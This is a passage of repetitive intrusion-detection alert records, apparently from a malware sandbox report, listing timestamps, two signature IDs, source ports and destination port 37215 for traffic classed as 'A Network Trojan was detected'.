              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843863
              SID:2835222
              Source Port:44408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836798
              SID:2829579
              Source Port:36180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297525
              SID:2835222
              Source Port:56892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341060
              SID:2835222
              Source Port:39062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213704
              SID:2835222
              Source Port:52464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439456
              SID:2835222
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298441
              SID:2829579
              Source Port:41460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711863
              SID:2835222
              Source Port:49316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316042
              SID:2835222
              Source Port:60324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997365
              SID:2835222
              Source Port:39610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974115
              SID:2835222
              Source Port:34078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228672
              SID:2829579
              Source Port:47618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318749
              SID:2835222
              Source Port:35274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872200
              SID:2835222
              Source Port:36378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707615
              SID:2835222
              Source Port:47256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017111
              SID:2829579
              Source Port:46312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992238
              SID:2835222
              Source Port:34922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088895
              SID:2829579
              Source Port:47846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658499
              SID:2835222
              Source Port:41950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822422
              SID:2835222
              Source Port:36176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229512
              SID:2835222
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092722
              SID:2829579
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358097
              SID:2829579
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.369171
              SID:2829579
              Source Port:46564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507517
              SID:2829579
              Source Port:35222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952898
              SID:2835222
              Source Port:53230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633348
              SID:2829579
              Source Port:35446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180335
              SID:2835222
              Source Port:54314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993953
              SID:2835222
              Source Port:34702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.179024
              SID:2829579
              Source Port:36262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276000
              SID:2829579
              Source Port:58444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192958
              SID:2835222
              Source Port:38068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246388
              SID:2835222
              Source Port:41676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154842
              SID:2829579
              Source Port:48168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.654042
              SID:2835222
              Source Port:53424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177349
              SID:2829579
              Source Port:42398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308477
              SID:2835222
              Source Port:53376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480840
              SID:2829579
              Source Port:54262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.155163
              SID:2835222
              Source Port:45860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168696
              SID:2835222
              Source Port:48966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631135
              SID:2829579
              Source Port:52924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417705
              SID:2835222
              Source Port:44338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247730
              SID:2829579
              Source Port:40900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.046184
              SID:2829579
              Source Port:51544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488500
              SID:2829579
              Source Port:39418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214157
              SID:2829579
              Source Port:35926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357565
              SID:2835222
              Source Port:33982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358950
              SID:2829579
              Source Port:60374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885281
              SID:2835222
              Source Port:41086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078946
              SID:2835222
              Source Port:42954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422059
              SID:2835222
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353646
              SID:2829579
              Source Port:60836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088493
              SID:2835222
              Source Port:54058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273921
              SID:2829579
              Source Port:59266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167713
              SID:2829579
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754069
              SID:2835222
              Source Port:38314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257623
              SID:2829579
              Source Port:60758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841982
              SID:2835222
              Source Port:57016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079333
              SID:2829579
              Source Port:49524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838981
              SID:2829579
              Source Port:33728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090406
              SID:2829579
              Source Port:33884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090387
              SID:2829579
              Source Port:55030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027949
              SID:2829579
              Source Port:41602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936209
              SID:2829579
              Source Port:34496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159516
              SID:2835222
              Source Port:52352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174571
              SID:2829579
              Source Port:47528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108646
              SID:2835222
              Source Port:52676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.944167
              SID:2835222
              Source Port:38574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913576
              SID:2835222
              Source Port:35596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248007
              SID:2829579
              Source Port:53112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508109
              SID:2829579
              Source Port:43300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135586
              SID:2835222
              Source Port:40936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175608
              SID:2829579
              Source Port:52028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635830
              SID:2829579
              Source Port:59532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214056
              SID:2835222
              Source Port:42468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373687
              SID:2829579
              Source Port:41822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439668
              SID:2835222
              Source Port:51024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568730
              SID:2835222
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191584
              SID:2835222
              Source Port:50964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076141
              SID:2829579
              Source Port:58842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098343
              SID:2829579
              Source Port:50620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477042
              SID:2835222
              Source Port:55664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298351
              SID:2835222
              Source Port:37274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780102
              SID:2835222
              Source Port:37836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152332
              SID:2829579
              Source Port:48400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309520
              SID:2835222
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936703
              SID:2829579
              Source Port:44406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039641
              SID:2835222
              Source Port:34990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308388
              SID:2835222
              Source Port:39096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308257
              SID:2835222
              Source Port:35656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547477
              SID:2829579
              Source Port:52476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077024
              SID:2829579
              Source Port:39606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039445
              SID:2829579
              Source Port:40162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631440
              SID:2835222
              Source Port:58544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221500
              SID:2829579
              Source Port:50366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170166
              SID:2835222
              Source Port:43062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670478
              SID:2829579
              Source Port:34376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991182
              SID:2829579
              Source Port:56458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133487
              SID:2829579
              Source Port:52818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241691
              SID:2829579
              Source Port:58632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546848
              SID:2829579
              Source Port:42156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728970
              SID:2835222
              Source Port:37734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.930728
              SID:2829579
              Source Port:49994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677581
              SID:2829579
              Source Port:44430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820774
              SID:2835222
              Source Port:48638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952437
              SID:2829579
              Source Port:41314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211197
              SID:2835222
              Source Port:56792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.804536
              SID:2835222
              Source Port:36030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.338635
              SID:2829579
              Source Port:59978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669304
              SID:2829579
              Source Port:54110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456079
              SID:2829579
              Source Port:53020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354377
              SID:2835222
              Source Port:44780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787853
              SID:2835222
              Source Port:38154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309214
              SID:2835222
              Source Port:33416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124559
              SID:2835222
              Source Port:56636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528245
              SID:2835222
              Source Port:52304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111794
              SID:2835222
              Source Port:47408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.552719
              SID:2835222
              Source Port:32790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711454
              SID:2829579
              Source Port:53114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870365
              SID:2829579
              Source Port:52814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486222
              SID:2835222
              Source Port:37584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095646
              SID:2835222
              Source Port:34752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354288
              SID:2835222
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.195887
              SID:2829579
              Source Port:34188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418149
              SID:2829579
              Source Port:41036
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124075
              SID:2829579
              Source Port:56812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128457
              SID:2835222
              Source Port:33928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.322862
              SID:2829579
              Source Port:57148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707281
              SID:2829579
              Source Port:47764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632843
              SID:2829579
              Source Port:37728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177526
              SID:2835222
              Source Port:56848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111254
              SID:2829579
              Source Port:50890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871960
              SID:2835222
              Source Port:46410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.606636
              SID:2829579
              Source Port:47208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221027
              SID:2829579
              Source Port:42756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.298943
              SID:2829579
              Source Port:34730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316349
              SID:2835222
              Source Port:43952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055908
              SID:2835222
              Source Port:42392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787564
              SID:2835222
              Source Port:37312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370064
              SID:2835222
              Source Port:53528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711950
              SID:2835222
              Source Port:48358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155954
              SID:2835222
              Source Port:39528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027013
              SID:2829579
              Source Port:48688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834638
              SID:2829579
              Source Port:49052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940932
              SID:2829579
              Source Port:59468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695989
              SID:2835222
              Source Port:35732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824107
              SID:2829579
              Source Port:55716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657484
              SID:2835222
              Source Port:58994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.867739
              SID:2829579
              Source Port:37744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091193
              SID:2829579
              Source Port:53222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611217
              SID:2829579
              Source Port:42170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480028
              SID:2829579
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275917
              SID:2829579
              Source Port:47278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092676
              SID:2829579
              Source Port:48226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941743
              SID:2829579
              Source Port:48624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086821
              SID:2835222
              Source Port:60196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553467
              SID:2835222
              Source Port:51908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.251922
              SID:2829579
              Source Port:55706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266338
              SID:2829579
              Source Port:52120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872560
              SID:2835222
              Source Port:41732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376218
              SID:2829579
              Source Port:37334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276216
              SID:2835222
              Source Port:46212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439621
              SID:2829579
              Source Port:45864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165497
              SID:2829579
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306269
              SID:2835222
              Source Port:46564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749903
              SID:2835222
              Source Port:53688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420337
              SID:2835222
              Source Port:59886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043500
              SID:2835222
              Source Port:39612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357654
              SID:2835222
              Source Port:47962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758777
              SID:2835222
              Source Port:34540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276043
              SID:2829579
              Source Port:50158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486425
              SID:2835222
              Source Port:53978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803432
              SID:2829579
              Source Port:49356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090010
              SID:2835222
              Source Port:51878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725944
              SID:2835222
              Source Port:41194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274965
              SID:2835222
              Source Port:41290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802661
              SID:2829579
              Source Port:37810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128013
              SID:2835222
              Source Port:47276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302594
              SID:2829579
              Source Port:38428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.343482
              SID:2829579
              Source Port:47318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110176
              SID:2835222
              Source Port:37636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638300
              SID:2835222
              Source Port:53308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.080028
              SID:2835222
              Source Port:48128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127825
              SID:2829579
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229378
              SID:2829579
              Source Port:34764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171468
              SID:2835222
              Source Port:50704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377521
              SID:2835222
              Source Port:60672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756560
              SID:2835222
              Source Port:34900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217007
              SID:2835222
              Source Port:56946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555752
              SID:2835222
              Source Port:53596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170353
              SID:2835222
              Source Port:50120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357976
              SID:2835222
              Source Port:55114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252880
              SID:2835222
              Source Port:36880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112312
              SID:2835222
              Source Port:37716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.239090
              SID:2835222
              Source Port:42574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943014
              SID:2835222
              Source Port:44926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137753
              SID:2835222
              Source Port:50514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
